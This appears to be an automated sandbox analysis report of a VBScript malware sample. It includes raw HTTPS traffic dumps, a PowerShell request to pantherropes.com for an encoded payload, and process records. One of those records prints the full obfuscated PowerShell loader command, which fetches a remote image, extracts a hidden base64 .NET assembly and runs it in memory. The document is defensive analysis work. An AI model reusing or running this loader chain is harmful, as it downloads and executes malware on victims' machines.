                                                                                        Data Ascii: :T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},
                                                                                        2024-04-23 05:53:28 UTC1369INData Raw: 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53
                                                                                        Data Ascii: Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rS
                                                                                        2024-04-23 05:53:28 UTC1369INData Raw: 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16
                                                                                        Data Ascii: W_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@
                                                                                        2024-04-23 05:53:28 UTC1369INData Raw: ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e
                                                                                        Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.549732116.206.104.2154436412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-04-23 05:53:34 UTC82OUTGET /error/xwapri.txt HTTP/1.1
                                                                                        Host: pantherropes.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-04-23 05:53:35 UTC257INHTTP/1.1 200 OK
                                                                                        Date: Tue, 23 Apr 2024 05:53:35 GMT
                                                                                        Server: Apache
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, close
                                                                                        Last-Modified: Mon, 22 Apr 2024 14:24:49 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 46424
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Type: text/plain
                                                                                        2024-04-23 05:53:35 UTC7935INData Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                        Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                        2024-04-23 05:53:35 UTC8000INData Raw: 67 41 41 41 58 41 55 47 41 79 42 51 59 41 63 48 41 30 42 67 5a 41 38 47 41 54 4e 42 41 41 38 44 41 2f 41 77 50 48 41 41 41 6c 42 51 62 41 45 47 41 4f 42 77 63 41 4d 48 41 6c 42 77 59 41 38 47 41 79 42 41 55 58 41 41 41 6c 42 41 62 41 51 48 41 70 42 41 56 41 63 48 41 76 42 41 5a 41 34 47 41 70 42 77 56 41 34 47 41 70 42 51 59 41 30 30 48 41 45 41 41 41 4d 43 41 6a 41 77 49 41 41 53 43 41 41 41 49 41 41 43 41 6a 41 77 49 41 4d 79 43 41 41 51 58 41 34 45 41 50 42 41 49 41 6f 44 41 4c 42 77 51 41 38 45 41 4d 42 77 55 41 41 46 41 42 42 77 51 41 73 56 48 41 41 51 58 41 59 45 41 47 42 77 54 41 41 43 41 36 41 77 53 41 4d 45 41 50 42 41 54 41 4d 46 41 51 42 51 51 41 4d 45 41 62 39 42 41 41 77 47 41 68 42 41 64 41 6b 47 41 77 42 51 59 41 4d 30 44 41 41 51 58 41 49
                                                                                        Data Ascii: gAAAXAUGAyBQYAcHA0BgZA8GATNBAA8DA/AwPHAAAlBQbAEGAOBwcAMHAlBwYA8GAyBAUXAAAlBAbAQHApBAVAcHAvBAZA4GApBwVA4GApBQYA00HAEAAAMCAjAwIAASCAAAIAACAjAwIAMyCAAQXA4EAPBAIAoDALBwQA8EAMBwUAAFABBwQAsVHAAQXAYEAGBwTAACA6AwSAMEAPBATAMFAQBQQAMEAb9BAAwGAhBAdAkGAwBQYAM0DAAQXAI
                                                                                        2024-04-23 05:53:35 UTC8000INData Raw: 59 4f 4a 58 5a 7a 56 31 58 30 56 32 5a 41 38 6d 5a 75 6c 6b 63 6c 52 58 64 77 31 32 62 44 42 41 64 6c 4e 46 41 6c 78 47 5a 75 46 47 53 30 6c 57 59 58 52 6e 62 6c 5a 58 52 41 4d 33 5a 68 78 6d 52 30 56 32 61 6a 39 32 55 41 51 33 59 6c 35 6d 62 76 4e 45 41 79 56 32 5a 6c 52 6e 62 4a 39 47 56 41 55 6d 65 70 4e 6c 63 6c 5a 6d 5a 31 4a 45 5a 75 56 32 55 66 52 58 5a 7a 42 51 5a 36 6c 32 55 79 56 6d 5a 6d 56 6e 51 6c 5a 58 61 6c 4e 57 5a 53 39 46 64 6c 4e 48 41 6c 52 58 65 43 42 51 5a 77 6c 48 56 73 39 32 59 76 52 33 62 79 42 46 41 6c 42 58 65 55 52 58 5a 72 4e 32 62 54 42 51 65 73 6c 57 62 68 5a 30 63 7a 56 6d 63 6b 52 57 51 41 73 32 59 68 4a 47 62 73 46 32 51 79 56 57 62 70 52 46 41 31 38 31 58 6b 45 47 5a 69 31 57 59 4d 39 46 41 77 45 47 41 30 38 31 58 6b 45
                                                                                        Data Ascii: YOJXZzV1X0V2ZA8mZulkclRXdw12bDBAdlNFAlxGZuFGS0lWYXRnblZXRAM3ZhxmR0V2aj92UAQ3Yl5mbvNEAyV2ZlRnbJ9GVAUmepNlclZmZ1JEZuV2UfRXZzBQZ6l2UyVmZmVnQlZXalNWZS9FdlNHAlRXeCBQZwlHVs92YvR3byBFAlBXeURXZrN2bTBQeslWbhZ0czVmckRWQAs2YhJGbsF2QyVWbpRFA181XkEGZi1WYM9FAwEGA081XkE
                                                                                        2024-04-23 05:53:35 UTC8000INData Raw: 4e 41 6b 45 41 54 45 67 4e 42 45 47 42 41 30 67 42 42 6b 31 41 36 7a 67 39 41 6b 47 41 54 45 67 4e 41 6b 47 41 54 77 51 38 41 6b 46 41 54 77 77 36 41 6b 31 41 70 48 67 4e 41 6b 6c 41 43 45 67 4e 42 45 46 41 58 77 51 7a 42 45 30 41 59 7a 41 79 42 6b 30 41 69 7a 41 72 42 45 30 41 64 4c 51 54 42 6b 7a 41 59 4c 67 79 41 6b 46 41 54 45 67 4e 42 6b 69 41 55 47 67 4e 42 45 79 41 53 79 67 45 42 6b 52 41 72 7a 77 41 42 45 42 41 54 45 67 4e 42 6b 41 41 54 45 67 4e 42 45 77 41 48 47 67 4e 41 6b 50 41 51 4b 41 6d 41 51 30 41 4d 45 67 4e 41 45 50 41 54 45 67 4e 41 6b 68 41 38 76 51 61 41 6b 4f 41 78 4a 51 54 41 6b 68 41 73 76 51 54 41 6b 43 41 6f 4a 41 4e 41 6b 42 41 6a 4a 77 4b 41 6b 68 41 66 76 41 4c 41 6b 74 41 55 47 67 4e 41 45 4e 41 54 45 67 4e 41 6b 4d 41 54 45
                                                                                        Data Ascii: NAkEATEgNBEGBA0gBBk1A6zg9AkGATEgNAkGATwQ8AkFATww6Ak1ApHgNAklACEgNBEFAXwQzBE0AYzAyBk0AizArBE0AdLQTBkzAYLgyAkFATEgNBkiAUGgNBEyASygEBkRArzwABEBATEgNBkAATEgNBEwAHGgNAkPAQKAmAQ0AMEgNAEPATEgNAkhA8vQaAkOAxJQTAkhAsvQTAkCAoJANAkBAjJwKAkhAfvALAktAUGgNAENATEgNAkMATE
                                                                                        2024-04-23 05:53:35 UTC8000INData Raw: 41 77 73 68 4b 47 51 62 4c 58 51 41 41 41 6f 43 67 48 51 41 41 41 73 43 67 4b 41 41 41 6c 68 69 42 41 41 77 55 6f 38 77 4b 45 41 41 41 70 41 6f 43 41 41 77 39 6f 6f 41 41 41 41 4b 4b 73 52 41 41 41 6f 69 66 45 41 41 41 70 38 48 48 78 63 41 42 41 41 67 4b 2b 74 67 42 41 41 77 55 6f 6f 41 41 41 45 43 4b 41 41 77 41 6f 44 53 53 72 45 42 41 41 38 43 41 41 41 41 55 41 49 41 4d 54 41 67 4b 47 41 77 4b 4b 59 42 42 72 59 77 4b 4b 63 72 43 41 41 67 39 6f 73 46 51 50 43 45 41 41 41 41 41 41 4d 43 62 45 41 41 41 6e 34 33 47 78 59 42 42 41 41 77 4a 2b 52 41 41 41 63 43 67 61 54 41 41 41 38 79 65 45 41 41 41 6f 38 6e 43 41 41 51 39 6f 55 42 4c 47 41 41 41 53 68 43 42 41 41 41 4b 2f 52 41 41 41 38 53 66 57 51 41 41 41 67 79 66 45 41 41 41 75 30 33 4b 41 41 41 42 6f 51
                                                                                        Data Ascii: AwshKGQbLXQAAAoCgHQAAAsCgKAAAlhiBAAwUo8wKEAAApAoCAAw9ooAAAAKKsRAAAoifEAAAp8HHxcABAAgK+tgBAAwUooAAAECKAAwAoDSSrEBAA8CAAAAUAIAMTAgKGAwKKYBBrYwKKcrCAAg9osFQPCEAAAAAAMCbEAAAn43GxYBBAAwJ+RAAAcCgaTAAA8yeEAAAo8nCAAQ9oUBLGAAAShCBAAAK/RAAA8SfWQAAAgyfEAAAu03KAAABoQ
                                                                                        2024-04-23 05:53:36 UTC6489INData Raw: 4f 79 46 52 45 41 41 67 41 56 69 6a 42 41 41 67 49 6f 41 48 41 45 45 6a 63 50 4d 6a 46 4b 41 41 41 48 68 69 46 77 42 41 42 78 49 58 45 52 41 41 41 43 51 4c 4f 47 41 41 41 69 67 69 43 41 41 67 49 6f 6f 41 41 41 30 48 4b 47 41 41 41 63 68 69 43 41 41 51 66 6f 51 41 41 41 67 68 66 77 42 41 42 6c 49 48 4b 7a 59 68 43 41 41 77 52 6f 59 42 63 41 51 51 4a 79 46 52 45 41 41 67 41 73 6a 44 41 65 72 41 41 41 55 43 4b 47 4d 68 43 41 41 77 49 6f 55 79 44 65 72 41 41 41 6b 33 62 45 41 41 41 63 34 48 49 7a 59 68 43 41 41 77 52 6f 59 42 63 41 51 77 44 79 46 52 45 41 41 77 41 63 67 6a 43 41 41 41 66 76 70 35 46 47 51 41 41 41 77 68 66 45 41 41 41 63 41 6f 43 41 41 77 65 7a 70 41 41 41 6f 33 63 47 41 41 41 33 59 67 2f 55 41 67 33 4b 41 41 41 6c 67 53 42 54 6f 41 41 41 4d
                                                                                        Data Ascii: OyFREAAgAVijBAAgIoAHAEEjcPMjFKAAAHhiFwBABxIXERAAACQLOGAAAigiCAAgIooAAA0HKGAAAchiCAAQfoQAAAghfwBABlIHKzYhCAAwRoYBcAQQJyFREAAgAsjDAerAAAUCKGMhCAAwIoUyDerAAAk3bEAAAc4HIzYhCAAwRoYBcAQwDyFREAAwAcgjCAAAfvp5FGQAAAwhfEAAAcAoCAAwezpAAAo3cGAAA3Yg/UAg3KAAAlgSBToAAAM


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:07:53:21
                                                                                        Start date:23/04/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs"
                                                                                        Imagebase:0x7ff6f7700000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:07:53:23
                                                                                        Start date:23/04/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsD